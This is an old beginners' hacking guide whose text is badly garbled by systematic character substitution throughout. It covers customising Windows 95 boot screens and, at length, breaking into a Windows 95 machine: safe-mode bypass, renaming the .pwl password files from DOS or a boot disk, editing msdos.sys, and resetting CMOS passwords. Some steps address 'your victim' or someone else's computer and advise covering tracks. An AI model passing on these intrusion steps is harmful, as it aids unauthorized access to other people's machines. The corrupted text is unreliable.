HACKING INTO COMPUTER SYSTEMS A Beginners Guide Guides of the Beginner's Series: So you want to be a harmless hacker?

Hacking Windows 95 Hacking into Windows 95 !and a little bit of "# lore$ Hacking from Windows %&'( 95 and "# How to Get a )Good) Shell *ccount( +art , How to Get a )Good) Shell *ccount( +art How to use the Web to look u. information on hacking& /om.uter hacking& Where did it begin and how did it grow? G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9, So you want to be a harmless hacker? :;ou mean you can hack without breaking the law?: #hat was the <oice of a high school freshman& He had me on the .hone because his father had =ust taken away his com.uter& His offense? /racking into my 1nternet account& #he boy had ho.ed to im.ress me with how :kewl: he was& But before 1 reali>ed he had gotten in( a sysadmin at my 1S+ had s.otted the kid's harmless e'.lorations and had alerted the .arents& "ow the boy wanted my hel. in getting back on line& 1 told the kid that 1 sym.athi>ed with his father& What if the sysadmin and 1 had been ma=or grouches? #his kid could ha<e wound u. in =u<enile detention& "ow 1 don't agree with .utting harmless hackers in =ail( and 1 would ne<er ha<e testified against him& But that's what some .eo.le do to folks who go snoo.ing in other .eo.le's com.uter accounts ?? e<en when the cul.rit does no harm& #his boy needs to learn how to kee. out of trouble Hacking is the most e'hilarating game on the .lanet& But it sto.s being fun when you end u. in a cell with a roommate named :S.ike&: But hacking doesn't ha<e to mean breaking laws& 1n this series of Guides we teach safe

hacking so that you don't ha<e to kee. looking back o<er your shoulders for narcs and co.s& What we're talking about is hacking as a healthy recreation( and as a free education that can @ualify you to get a high .aying =ob& 1n fact( many network systems administrators( com.uter scientists and com.uter security e'.erts first learned their .rofessions( not in some college .rogram( but from the hacker culture& *nd you may be sur.rised to disco<er that ultimately the 1nternet is safeguarded not by law enforcement agencies( not by giant cor.orations( but by a worldwide network of( yes( hackers& ;ou( too( can become one of us& *nd ?? hacking can be sur.risingly easy& Heck( if 1 can do it( anyone can 5egardless of why you want to be a hacker( it is definitely a way to ha<e fun( im.ress your friends( and get dates& 1f you are a female hacker you become totally irresistible to men& #ake my word for it AB2 #hese Guides to !mostly$ Harmless Hacking can be your gateway into this world& *fter reading =ust a few of these Guides you will be able to .ull off stunts that will be legal( .hun( and will im.ress the heck out of your friends& #hese Guides can e@ui. you to become one of the <igilantes that kee.s the 1nternet from being destroyed by bad guys& 3s.ecially s.ammers& Heh( heh( heh& ;ou can also learn how to kee. the bad guys from messing with your 1nternet account( email( and .ersonal com.uter& ;ou'll learn not to be frightened by silly hoa'es that .ranksters use to kee. the a<erage 1nternet user in a ti>>y& 1f you hang in with us through a year or so( you can learn enough and meet the .eo.le on our email list and 15/ channel who can hel. you to become truly elite& Howe<er( before you .lunge into the hacker subculture( be .re.ared for that hacker attitude& ;ou ha<e been warned& So&&&welcome to the ad<enture of hacking WH*# 24 1 "332 1" 45235 #4 H*/8?

;ou may wonder whether hackers need e'.ensi<e com.uter e@ui.ment and a shelf full of technical manuals& #he answer is "4 Hacking can be sur.risingly easy Better yet( if you know how to search the Web( you can find almost any com.uter information you need for free& 1n fact( hacking is so easy that if you ha<e an on?line ser<ice and know how to send and read email( you can start hacking immediately& #he G#6HH Beginners' Series 9- will show you where you can download s.ecial hacker? friendly .rograms for Windows that are absolutely free& *nd we'll show you some easy hacker tricks you can use them for& "ow su..ose you want to become an elite hacker? *ll you will really need is an ine'.ensi<e :shell account: with an 1nternet Ser<ice +ro<ider& 1n the G#6HH Beginners' Series 9% we will tell you how to get a shell account( log on( and start .laying the greatest game on 3arth: 0ni' hacking #hen in Col&s 1( 11( and 111 of the G#6HH you can get into 0ni' hacking seriously& ;ou can e<en make it into the ranks of the 0berhackers without loading u. on e'.ensi<e com.uter e@ui.ment& 1n Col& 11 we introduce 7inu'( the free hacker?friendly o.erating system& 1t will e<en run on a %DE +/ with =ust - 6b 5*6 7inu' is so good that many 1nternet Ser<ice +ro<iders use it to run their systems& 1n Col& 111 we will also introduce +erl( the shell .rogramming language belo<ed of 0berhackers& We will e<en teach some seriously deadly hacker :e'.loits: that run on +erl using 7inu'& 48( you could use most of these e'.loits to do illegal things& But they are only illegal if you run them against someone else's com.uter without their .ermission& ;ou can run any .rogram in this series of Guides on your own com.uter( or your !consenting$ friend's com.uter ?? if you dare Hey( seriously( nothing in this series of Guides will actually hurt your com.uter( unless you decide to trash it on .ur.ose& We will also o.en the gateway to an ama>ing underground where you can stay on to. of almost e<ery disco<ery of com.uter security flaws& ;ou can learn how to either e'.loit them ?? or defend your com.uter against them *bout the Guides to !mostly$ Harmless Hacking We ha<e noticed that there are lots of books that glamori>e hackers& #o read these books you would think that it takes many years of brilliant work to

become one& 4f course we hackers lo<e to .er.etuate this myth because it makes us look so incredibly kewl& But how many books are out there that tell the beginner ste. by ste. how to actually do this hacking stu.h? "one Seriously( ha<e you e<er read FSecrets of a Su.erhackerF by #he 8nightmare !7oom.onics( ,99G$ or FHorbidden Secrets of the 7egion of 2oom HackersF by Salacious /rumb !St& 6ahoun Books( ,99G$? #hey are full of <ague and out of date stu.h& Gi<e me a break& *nd if you get on one of the hacker news grou.s on the 1nternet and ask .eo.le how to do stu.h( some of them insult and make fun of you& 48( they all make fun of you& We see many hackers making a big deal of themsel<es and being mysterious and refusing to hel. others learn how to hack& Why? Because they don't want you to know the truth( which is that most of what they are doing is really <ery sim.le Well( we thought about this& We( too( could en=oy the .leasure of insulting .eo.le who ask us how to hack& 4r we could get big egos by actually teaching thousands of .eo.le how to hack& 6uhahaha& How to 0se the Guides to !mostly$ Harmless Hacking 1f you know how to use a .ersonal com.uter and are on the 1nternet( you already know enough to start learning to be a hacker& ;ou don't e<en need to read e<ery single Guide to !mostly$ Harmless Hacking in order to become a hacker& ;ou can count on anything in Columes 1( 11 and 111 being so easy that you can =um. in about anywhere and =ust follow instructions& But if your .lan is to become :elite(: you will do better if you read all the Guides( check out the many Web sites and newsgrou.s to which we will .oint you( and find a mentor among the many talented hackers who .ost to our Hackers forum or chat on our 15/ ser<er at htt.:IIwww&infowar&com( and on the Ha..y Hacker email list !email hackerJtechbroker&com with message :subscribe:$& 1f your goal is to become an 0berhacker( the Guides will end u. being only the first in a mountain of material that you will need to study& Howe<er( we

offer a study strategy that can aid you in your @uest to reach the .innacle of hacking& How to "ot Get Busted 4ne slight .roblem with hacking is that if you ste. o<er the line( you can go to =ail& We will do our best to warn you when we describe hacks that could get you into trouble with the law& But we are not attorneys or e'.erts on cyberlaw& 1n addition( e<ery state and e<ery country has its own laws& *nd these laws kee. on changing& So you ha<e to use a little sense& Howe<er( we ha<e a Guide to !mostly$ Harmless Hacking /om.uter /rime 7aw Series to hel. you a<oid some .itfalls& But the best .rotection against getting busted is the Golden 5ule& 1f you are about to do something that you would not like to ha<e done to you( forget it& 2o hacks that make the world a better .lace( or that are at least fun and harmless( and you should be able to kee. out of trouble& So if you get an idea from the Guides to !mostly$ Harmless Hacking that hel.s you to do something malicious or destructi<e( it's your .roblem if you end u. being the ne't hacker behind bars& Hey( the law won't care if the guy whose com.uter you trash was being a d)))& 1t won't care that the giant cor.oration whose database you filched shafted your best buddy once& #hey will only care that you broke the law& #o some .eo.le it may sound like .hun to become a national sensation in the latest hysteria o<er 3<il Genius hackers& But after the trial( when some reader of these Guides ends u. being the reluctant :girlfriend: of a con<ict named S.ike( how ha..y will his news cli..ings make him? /on<entions 0sed in the Guides ;ou'<e .robably already noticed that we s.ell some words funny( like :kewl: and :.hun&: #hese are hacker slang terms& Since we often communicate with each other <ia email( most of our slang consists of ordinary words with e'traordinary s.ellings& Hor e'am.le( a hacker might s.ell :elite: as :%l,t%(: with %'s substituting for e's and ,'s for i's& He or she may e<en s.ell :elite: as :%,%%K& #he Guides sometimes use these slang s.ellings to hel. you learn how to write email like a hacker&

4f course( the cute s.elling stu.h we use will go out of date fast& So we do not guarantee that if you use this slang( .eo.le will read your email and think( :4hhh( you must be an 3<il Genius 1'm sooo im.ressed : #ake it from us( guys who need to kee. on in<enting new slang to .ro<e they are :k?rad %l,t%: are often lusers and lamers& So if you don't want to use any of the hacker slang of these Guides( that's 48 by us& 6ost 0berhackers don't use slang( either& Who *re ;ou? We'<e made some assum.tions about who you are and why you are reading these Guides: L ;ou own a +/ or 6acintosh .ersonal com.uter L ;ou are on?line with the 1nternet L ;ou ha<e a sense of humor and ad<enture and want to e'.ress it by hacking L 4r ?? you want to im.ress your friends and .ick u. chicks !or guys$ by making them think you are an 3<il Genius So( does this .icture fit you? 1f so( 48( dMMd>( start your com.uters& *re you ready to hack? G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9-( Section 4ne& Hacking Windows 95 FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1m.ortant warning: this is a beginners lesson& B3G1""35S& Will all you su.er k?rad elite ha'ors out there =ust ski. reading this one( instead reading it and feeling all insulted at how easy it is and then emailing me to bleat :#his G#6HH i> - e>y your )))))) u.(wee hate u NOP: Go study something that seriously challenges your intellect such as :0ni' for 2ummies(: 48? Ha<e you e<er seen what ha..ens when someone with an *merica 4nline account .osts to a hacker news grou.( email list( or 15/ chat session? 1t gi<es you a true understanding of what :flame: means( right?

"ow you might think that making fun of dumb&newbieJaol&com is =ust some .re=udice& Sort of like how managers in big cor.orations don't wear dreadlocks and fraternity boys don't dri<e ;ugos& But the real reason serious hackers would ne<er use *47 is that it doesn't offer 0ni' shell accounts for its users& *47 fears 0ni' because it is the most fabulous( e'citing( .owerful( hacker?friendly o.erating system in the Solar system&&& gotta calm down &&& anyhow( 1'd feel cri..led without 0ni'& So *47 figures offering 0ni' shell accounts to its users is begging to get hacked& 0nfortunately( this attitude is s.reading& 3<ery day more 1S+s are deciding to sto. offering shell accounts to their users& But if you don't ha<e a 0ni' shell account( you can still hack& *ll you need is a com.uter that runs Windows 95 and =ust some really retarded on?line account like *merica 4nline or /om.user<e& 1n this Beginner's Series 9- we co<er se<eral fun things to do with Windows and e<en the most hacker?hostile 4nline ser<ices& *nd( remember( all these things are really easy& ;ou don't need to be a genius& ;ou don't need to be a com.uter scientist& ;ou don't need to won an e'.ensi<e com.uter& #hese are things anyone with Windows 95 can do& Section 4ne: /ustomi>e your Windows 95 <isuals& Set u. your startu.( background and logoff screens so as to ama>e and befuddle your non?hacker friends& Section #wo: Sub<ert Windows nanny .rograms such as Surfwatch and the setu.s many schools use in the ho.e of kee.ing kids from using unauthori>ed .rograms& +ro<e to yourself ?? and your friends and coworkers ?? that Windows 95 .asswords are a =oke& Section #hree: 3'.lore other com.uters ?? 48( let's be blatant ?? hack ?? from your Windows home com.uter using e<en =ust *47 for 1nternet access& H4W #4 /0S#461Q3 W1"24WS 95 C1S0*7S 48( let's say you are hosting a wild .arty in your home& ;ou decide to show your buddies that you are one of those dread hacker dMMd>& So you fire u. your com.uter and what should come u. on your screen but the logo for :Windows 95&: 1t's kind of lame looking( isn't it? ;our com.uter looks =ust

like e<eryone else's bo'& Rust like some boring cor.orate workstation o.erated by some guy with an 1S in the DMs& "ow if you are a serious hacker you would be booting u. 7inu' or HreeBS2 or some other kind of 0ni' on your .ersonal com.uter& But your friends don't know that& So you ha<e an o..ortunity to social engineer them into thinking you are fabulously elite by =ust by customi>ing your bootu. screen& "ow let's say you want to boot u. with a black screen with orange and yellow flames and the slogan : 8?5ad 2oomsters of the *.ocaly.se&: #his turns out to be su.er easy& "ow 6icrosoft wants you to ad<ertise their o.erating system e<ery time you boot u.& 1n fact( they want this so badly that they ha<e gone to court to try to force com.uter retailers to kee. the 6icroOoft bootu. screen on the systems these <endors sell& So 6icrosoft certainly doesn't want you messing with their bootu. screen( either& So 6O has tried to hide the bootu. screen software& But they didn't hide it <ery well& We're going to learn today how to totally thwart their .lans& ))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius ti.: 4ne of the rewarding things about hacking is to find hidden files that try to kee. you from modifying them ?? and then to mess with them anyhow& #hat's what we're doing today& #he Win95 bootu. gra.hics is hidden in either a file named c:Tlogo&sys andIor i.&sys& #o see this file( o.en Hile 6anager( click :<iew:( then click :by file ty.e(: then check the bo' for :show hiddenIsystem files&: #hen( back on :<iew(: click :all file details&: #o the right of the file logo&sys you will see the letters :rhs&: #hese mean this file is :read?only( hidden( system&: #he reason this innocuous gra.hics file is labeled as a system file ?? when it really is =ust a gra.hics file with some animation added ?? is because 6icrosoft is afraid you'll change it to read something like :Welcome to Windo>e 95 ?? Breakfast of 7users : So by making it a read?only file( and hiding it( and calling it a system file as if it were something so darn im.ortant it would destroy your com.uter if you were to mess with it( 6icrosoft is trying to trick you into lea<ing it alone& )))))))))))))))))))))))))))))))))))))))))))))))

#he easiest way to thwart these Windo>e 95 startu. and shut down screens is to go to htt.:IIwww&windows95&comIa..sI and check out their .rograms& But we're hackers( so we like to do things oursel<es& So here's how to do this without using a canned .rogram& We start by finding the 6S+aint .rogram& 1t's .robably under the accessories folder& But =ust in case you're like me and kee. on mo<ing things around( here's the fail?safe .rogram finding routine: ,$ /lick :Start: on the lower left corner of your screen& -$ /lick :Windows 3'.lorer: %$ /lick :#ools: G$ /lick :Hind: 5$ /lick :files or folders: E$ *fter :named: ty.e in :6S+aint: K$ *fter :7ook in: ty.e in '/:: D$ /heck the bo' that says :include subfolders: 9$ /lick :find now: ,M$ 2ouble click on the icon of a .aint bucket that turns u. in a window& #his loads the .aint .rogram& ,,$ Within the .aint .rogram( click :file: ,-$ /lick :o.en: 48( now you ha<e 6S+aint& "ow you ha<e a su.er easy way to create your new bootu. screen: ,%$ *fter :file name: ty.e in c:TwindowsTlogos&sys& #his brings u. the gra.hic you get when your com.uter is ready to shut down saying :1t's now safe to turn off your com.uter&: #his gra.hic has e'actly the right format to be used for your startu. gra.hic& So you can .lay with it any way you want !so long as you don't do anything on the *ttributes screen under the 1mages menu$ and use it for your startu. gra.hic& ,G$ "ow we .lay with this .icture& Rust e'.eriment with the controls of 6S+aint and try out fun stuff& ,5$ When you decide you really like your .icture !fill it with frightening hacker stu.h( right?$( sa<e it as c:Tlogo&sys& #his will o<erwrite the Windows startu. logo file& Hrom now on( any time you want to change your startu. logo( you will be able to both read and write the file logo&sys&

,E& 1f you want to change the shut down screens( they are easy to find and modify using 6S+aint& #he beginning shutdown screen is named c:TwindowsTlogow&sys& *s we saw abo<e( the final :1t's now safe to turn off your com.uter: screen gra.hic is named c:TwindowsTlogos&sys& ,K& #o make gra.hics that will be a<ailable for your wall.a.er( name them something like c:TwindowsTe<ilha'or&bm. !substituting your filename for :e'ilha'or: ?? unless you like to name your wall.a.er :e<ilha'or&:$ )))))))))))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius ti.: #he 6icrosoft Windows 95 startu. screen has an animated bar at the bottom& But once you re.lace it with your own gra.hic( that animation is gone& Howe<er( you can make your own animated startu. screen using the shareware .rogram B6+ Wi>ard& Some download sites for this goodie include: htt.:IIwww&.i..in&comI3nglishI/om.utersSoftwareISoftwareIWindows95Igr a.hic&htm htt.:IIsearch&windows95&comIa..sIeditors&html htt.:IIwww&windows95&comIa..sIeditors&html 4r you can download the .rogram 7ogo6ania( which automatically resi>es any bitma. to the correct si>e for your logon and logoff screens and adds se<eral ty.es of animation as well& ;ou can find it at ft.&>dnet&comI.cmagI,99KIM%-5Ilogoma&>i. )))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ow the trouble with using one of the e'isting Win95 logo files is that they only allow you to use their original colors& 1f you really want to go wild( o.en 6S+aint again& Hirst click :1mage(: then click :attributes&: Set width %-M and height to GMM& 6ake sure under 0nits that +els is selected& "ow you are free to use any color combination a<ailable in this .rogram& 5emember to sa<e the file as c:Tlogo&sys for your startu. logo( or c:TwindowsTlogow&sys and or c:TwindowsTlogos&sys for your shutdown screens& But if you want some really fabulous stuff for your starting screen( you can steal gra.hics from your fa<orite hacker .age on the Web and im.ort them into Win95's startu. and shutdown screens& Here's how you do it& ,$ Wow( kewl gra.hics Sto. your browsing on that Web .age and hit the :.rint screen: button& -$ 4.en 6S+aint and set width to %-M and height to GMM with units +els&

%$ /lick edit( then click .aste& Bam( that image is now in your 6S+aint .rogram& G$ When you sa<e it( make sure attributes are still %-MUGMM +els& "ame it c:Tlogo&sys( c:TwindowsTlogow&sys( c:TwindowsTlogos&sys( or c:TwinodwsTe<ilha'or&bm. de.ending on which screen or wall.a.er you want to dis.lay it on& 4f course you can do the same thing by o.ening any gra.hics file you choose in 6S+aint or any other gra.hics .rogram( so long as you sa<e it with the right file name in the right directory and si>e it %-MUGMM +els& 4h( no( stuffy *untie Su>ie is coming to <isit and she wants to use my com.uter to read her email 1'll ne<er hear the end of it if she sees my 8?5ad 2oomsters of the *.ocaly.se startu. screen Here's what you can do to get your boring 6icroOoft startu. logo back& Rust change the name of c:logo&sys to something innocuous that *unt Su>ie won't see while snoo.ing with file manager& Something like logo&bak& Guess what ha..ens? #hose 6icrosoft guys figured we'd be doing things like this and hid a co.y of their boring bootu. screen in a file named :io&sys&: So if you rename or delete their original logo&sys( and there is no file by that name left( on bootu. your com.uter dis.lays their same old Windows 95 bootu. screen& "ow su..ose your Win95 bo' is attached to a local area network !7*"$? 1t isn't as easy to change your bootu. logo( as the network may o<erride your changes& But there is a way to thwart the network& 1f you aren't afraid of your boss seeing your :8?5ad 2ommsters of the *.ocaly.se: s.ashed o<er an '? rated backdro.( here's how to customi>e your bootu. gra.hics& M&95 .olicy editor !comes on the 95 cd$ with the default admin&adm will let you change this& 0se the .olicy editor to o.en the registry( select 'local com.uter' select network( select 'logon' and then selet 'logon banner'& 1t'll then show you the current banner and let you change it and sa<e it back to the registry& ))))))))))))))))))))))))))))))))))))))

3<il genius ti.: Want to mess with io&sys or logo&sys? Here's how to get into them& *nd( guess what( this is a great thing to learn in case you e<er need to break into a Windows com.uter ?? something we'll look at in detail in the ne't section& /lick :Start: then :+rograms: then :6S?24S&: *t the 6SF24S .rom.t enter the commands: *##51B ?5 ?H ?S /:T14&S;S *##51B ?5 ?H ?S /:T74G4&S;S "ow they are totally at your mercy( muhahaha But don't be sur.rised is 6S+aint can't o.en either of these files& 6S+aint only o.ens gra.hics files& But io&sys and logo&sys are set u. to be used by animation a..lications& )))))))))))))))))))))))))))))))))))))) 48( that's it for now& ;ou %,%%K hackers who are feeling insulted by reading this because it was too easy( tough cookies& 1 warned you& But 1'll bet my bo' has a ha..ier hacker logon gra.hic than yours does& 8?5ad 2oomsters of the a.ocaly.se( yesss G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9-( Section #wo& Hacking into Windows 95 !and a little bit of "# lore$ FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1m.ortant warning: this is a beginners lesson& B3G1""35S& Will all you geniuses who were born already knowing %-?bit Windows =ust ski. reading this one( 48? We don't need to hear how disgusted you are that not e<eryone already knows this& +*53"#*7 21S/53#14" *2C1S32 #his lesson will lay the foundation for learning how to hack what now is the most commonly installed workstation o.erating system: Windows "#& 1n fact( Windows "# is coming into wide use as a local area network !7*"$(

1nternet( intranet( and Web ser<er& So if you want to call yourself a serious hacker( you'd better get a firm gras. on Win "#& 1n this lesson you will learn serious hacking techni@ues useful on both Windows 95 and Win "# systems while .laying in com.lete safety on your own com.uter& 1n this lesson we e'.lore: L Se<eral ways to hack your Windows 95 logon .assword L How to hack your +entium /64S .assword L How to hack a Windows 5egistry ?? which is where access control on Windows?based 7*"s( intranets and 1nternet and Webs ser<ers are hidden 7et's set the stage for this lesson& ;ou ha<e your buddies o<er to your home to see you hack on your Windows 95 bo'& ;ou'<e already .ut in a really industrial ha'or?looking bootu. screen( so they are already trembling at the thought of what a tremendously elite dMMd you are& So what do you do ne't? How about clicking on :Start(: clicking :settings: then :control .anel: then :.asswords&: #ell your friends your .assword and get them to enter a secret new one& #hen shut down your com.uter and tell them you are about to show them how fast you can break their .assword and get back into your own bo' #his feat is so easy 1'm almost embarrassed to tell you how it's done& #hat's because you'll say :Sheesh( you call that .assword .rotection? *ny idiot can break into a Win 95 bo' *nd of course you're right& But that's the 6icroOoft way& 5emember this ne't time you e'.ect to kee. something on your Win95 bo' confidential& *nd when it comes time to learn Win "# hacking( remember this 6icroOoft security mindset& #he funny thing is that <ery few hackers mess with "# today because they're all busy cracking into 0ni' bo'es& But there are countless ama>ing Win "# e'.loits =ust waiting to be disco<ered& 4nce you see how easy it is to break into your Win 95 bo'( you'll feel in your bones that e<en without us holding your hand( you could disco<er ways to crack Win "# bo'es( too& But back to your buddies waiting to see what an elite hacker you are& 6aybe you'll want them to turn their backs so all they know is you can break into a

Win95 bo' in less than one minute& 4r maybe you'll be a nice guy and show them e'actly how it's done& But first( here's a warning& #he first few techni@ues we're showing work on most home Win 95 installations& But( es.ecially in cor.orate local area networks !7*"s$( se<eral of these techni@ues don't work& But ne<er fear( in this lesson we will co<er enough ways to break in that you will be able to gain control of absolutely )any) Win 95 bo' to which you ha<e .hysical access& But we'll start with the easy ways first& 3asy Win 95 Breakin 9,: Ste. one: boot u. your com.uter& Ste. two: When the :system configuration: screen comes u.( .ress the :H5: key& 1f your system doesn't show this screen( =ust kee. on .ressing the H5 key& 1f your Win 95 has the right settings( this boots you into :safe mode&: 3<erything looks weird( but you don't ha<e to gi<e your .assword and you still can run your .rograms& #oo easy 48( if you want to do something that looks a little classier( here's another way to e<ade that new .assword& 3asy Win 95 Breakin 9-: Ste. one: Boot u.& Ste. two: when you get to the :system configuration: screen( .ress the HD key& #his gi<es you the 6icrosoft Windows 95 Startu. 6enu& Ste. three: choose number K& #his .uts you into 6S?24S& *t the .rom.t( gi<e the command :rename c:TwindowsT).wl c:TwindowsT)>>>&: )))))))))))))))))))))))))))) "ewbie note: 6S?24S stands for 6icrosoft 2isk 4.erating System( an ancient o.erating system dating from ,9D,& 1t is a command?line o.erating system( meaning that you get a .rom.t !.robably c:TV$ after which you ty.e in a command and .ress the enter key& 6S?24S is often abbre<iated 24S& 1t is a little bit similar to 0ni'( and in fact in its first <ersion it incor.orated thousands of lines of 0ni' code&

))))))))))))))))))))))))))))) Ste. four: reboot& ;ou will get the .assword dialog screen& ;ou can then fake out your friends by entering any darn .assword you want& 1t will ask you to reenter it to confirm your new .assword& Ste. fi<e& ;our friends are smart enough to sus.ect you =ust created a new .assword( huh? Well( you can .ut the old one your friends .icked& 0se any tool you like ?? Hile 6anager( 3'.lorer or 6S?24S ?? to rename )&>>> back to )&.wl& Ste. si': reboot and let your friends use their secret .assword& 1t still works #hink about it& 1f someone where to be sneaking around another .erson's Win 95 com.uter( using this techni@ue( the only way the <ictim could determine there had been an intruder is to check for recently changed files and disco<er that the )&.wl files ha<e been messed with )))))))))))))))))))))))))))) 3<il genius ti.: 0nless the msdos&sys file bootkeysWM o.tion is acti<e( the keys that can do something during the bootu. .rocess are HG( H5( HE( HD( ShiftXH5( /ontrolXH5 and ShiftXHD& +lay with them )))))))))))))))))))))))))))) "ow let's su..ose you disco<ered that your Win 95 bo' doesn't res.ond to the bootu. keys& ;ou can still break in& 1f your com.uter does allow use of the boot keys( you may wish to disable them in order to be a teeny bit more secure& Besides( it's .hun to show your friends how to use the boot keys and then disable these so when they try to mess with your com.uter they will disco<er you'<e locked them out& #he easiest ?? but slowest ?? way to disable the boot keys is to .ick the .ro.er settings while installing Win 95& But we're hackers( so we can .ull a fast trick to do the same thing& We are going to learn how to edit the Win 95 msdos&sys file( which controls the boot se@uence& 3asy Way to 3dit your 6sdos&sys Hile: Ste. >ero: Back u. your com.uter com.letely( es.ecially the system files& 6ake sure you ha<e a Windows 95 boot disk& We are about to .lay with fire

1f you are doing this on someone else's com.uter( let's =ust ho.e either you ha<e .ermission to destroy the o.erating system( or else you are so good you couldn't .ossibly make a serious mistake& ))))))))))))))))))))))))))))))) "ewbie note: ;ou don't ha<e a boot disk? Shame( shame( shame 3<eryone ought to ha<e a boot disk for their com.uter =ust in case you or your buddies do something really horrible to your system files& 1f you don't already ha<e a Win 95 boot disk( here's how to make one& #o do this you need an em.ty flo..y disk and your Win 95 installation disk!s$& /lick on Start( then Settings( then /ontrol +anel( then *ddI5emo<e +rograms( then Startu. 2isk& Hrom here =ust follow instructions& )))))))))))))))))))))))))))))))) Ste. one: Hind the file msdos&sys& 1t is in the root directory !usually /:T$& Since this is a hidden system file( the easiest way to find it is to click on 6y /om.uter( right click the icon for your boot dri<e !usually /:$( left click 3'.lore( then scroll down the right side frame until you find the file :msdos&sys&: Ste. two: 6ake msdos&sys writable& #o do this( right click on msdos&sys( then left click :.ro.erties&: #his brings u. a screen on which you uncheck the :read only: and :hidden: bo'es& ;ou ha<e now made this a file that you can .ull into a word .rocessor to edit& Ste. three: Bring msdos&sys u. in Word +ad& #o do this( you go to Hile 6anager& Hind msdos&sys again and click on it& #hen click :associate: under the :file: menu& #hen click on :Word +ad&: 1t is <ery im.ortant to use Word +ad and not "ote.ad or any other word .rocessing .rogram #hen double click on msdos&sys& Ste. four: We are ready to edit& ;ou will see that Word +ad has come u. with msdos&sys loaded& ;ou will see something that looks like this: Y+athsZ Win2irW/:TW1"24WS WinBoot2irW/:TW1"24WS HostWinBoot2r<W/ Y4.tionsZ BootG01W,

"etworkW, A A#he following lines are re@uired for com.atibility with other .rograms& A2o not remo<e them !6S24SVS;S needs to be V,M-G bytes$& A'''''''''''''''''''''''''''''''''''''''''''''''''''' A'''''''''''''''''''''''''''''''''''''''''''''''''''' & & & #o disable the function keys during bootu.( directly below Y4.tionsZ you should insert the command :Boot8eysWM&: 4r( another way to disable the boot keys is to insert the command Boot2elayWM& ;ou can really mess u. your snoo.y hacker wannabe friends by .utting in both statements and ho.e they don't know about Boot2elay& #hen sa<e msdos&sys& Ste. fi<e: since msdos&sys is absolutely essential to your com.uter( you'd better write .rotect it like it was before you edited it& /lick on 6y /om.uter( then 3'.lore( then click the icon for your boot dri<e !usually /:$( then scroll down the right side until you find the file :msdos&sys&: /lick on msdos&sys( then left click :.ro.erties&: #his brings back that screen with the :read only: and :hidden: bo'es& /heck :read only&: Ste. si': ;ou )are) running a <irus scanner( aren't you? ;ou ne<er know what your .hriends might do to your com.uter while your back is turned& When you ne't boot u.( your <irus scanner will see that msdos&sys has changed& 1t will assume the worst and want to make your msdos&sys file look =ust like it did before& ;ou ha<e to sto. it from doing this& 1 run "orton *nti<irus( so all 1 ha<e to do when the <irus warning screen comes u. it to tell it to :innoculate&: Hard Way to 3dit your !or someone else's$ 6sdos&sys Hile& Ste. >ero& #his is useful .ractice for using 24S to run ram.ant someday in Win "# 7*"s( Web and 1nternet ser<ers& +ut a Win 95 boot disk in the a: dri<e& Boot u.& #his gi<es you a 24S .rom.t *:T& Ste. one: 6ake msdos&sys writable& Gi<e the command :attrib ?h ?r ?s c:Tmsdos&sys: !#his assumes the c: dri<e is the boot disk&$

Ste. two: gi<e the command :edit msdos&sys: #his brings u. this file into the word .rocessor& Ste. three: 0se the edit .rogram to alter msdos&sys& Sa<e it& 3'it the edit .rogram& Ste. four: *t the 24S .rom.t( gi<e the command :attrib Xr Xh Xs c:Tmsdos&sys: to return the msdos&sys file to the status of hidden( read?only system file& 48( now your com.uter's boot keys are disabled& 2oes this mean no one can break in? Sorry( this isn't good enough& *s you may ha<e guessed from the :Hard Way to 3dit your 6sdos&sys: instruction( your ne't o.tion for Win 95 breakins is to use a boot disk that goes in the a: flo..y dri<e& How to Break into a Win 95 Bo' 0sing a Boot 2isk Ste. one: shut down your com.uter& Ste. two: .ut boot disk into *: dri<e& Ste. three: boot u.& Ste. four: at the *:T .rom.t( gi<e the command: rename c:TwindowsT)&.wl c:TwindowsT)&>>>& Ste. four: boot u. again& ;ou can enter anything or nothing at the .assword .rom.t and get in& Ste. fi<e: /o<er your tracks by renaming the .assword files back to what they were& Wow( this is =ust too easy What do you do if you want to kee. your .rankster friends out of your Win 95 bo'? Well( there is one more thing you can do& #his is a common trick on 7*"s where the network administrator doesn't want to ha<e to deal with .eo.le monkeying around with each others' com.uters& #he answer ?? but not a <ery good answer ?? is to use a /64S .assword&

How to 6ess With /64S 9, #he basic settings on your com.uter such as how many and what kinds of disk dri<es and which ones are used for booting are held in a /64S chi. on the mother board& * tiny battery kee.s this chi. always running so that whene<er you turn your com.uter back on( it remembers what is the first dri<e to check in for bootu. instructions& 4n a home com.uter it will ty.ically be set to first look in the *: dri<e& 1f the *: dri<e is em.ty( it ne't will look at the /: dri<e& 4n my com.uter( if 1 want to change the /64S settings 1 .ress the delete key at the <ery beginning of the bootu. se@uence& #hen( because 1 ha<e instructed the /64S settings to ask for a .assword( 1 ha<e to gi<e it my .assword to change anything& 1f 1 don't want someone to boot from the *: dri<e and mess with my .assword file( 1 can set it so it only boots from the /: dri<e& 4r e<en so that it only boots from a remote dri<e on a 7*"& So( is there a way to break into a Win 95 bo' that won't boot from the *: dri<e? *bsolutely yes But before trying this one out( be sure to write down )*77) your /64S settings& *nd be .re.ared to make a total wreck of your com.uter& Hacking /64S is e<en more destructi<e than hacking system files& Ste. one: get a .hilli.s screwdri<er( solder sucker and soldering iron& Ste. two: o.en u. your <ictim& Ste. three: remo<e the battery & Ste. four: .lug the battery back in& *lternate ste. three: many motherboards ha<e a % .in =um.er to reset the /64S to its default settings& 7ook for a =um.er close to the battery or look at your manual if you ha<e one& Hor e'am.le( you might find a three .in de<ice with .ins one and two =um.ered& 1f you mo<e the =um.er to .ins two and three and lea<e it there for o<er fi<e seconds( it may reset the /64S& Warning ?? this will not work on all com.uters

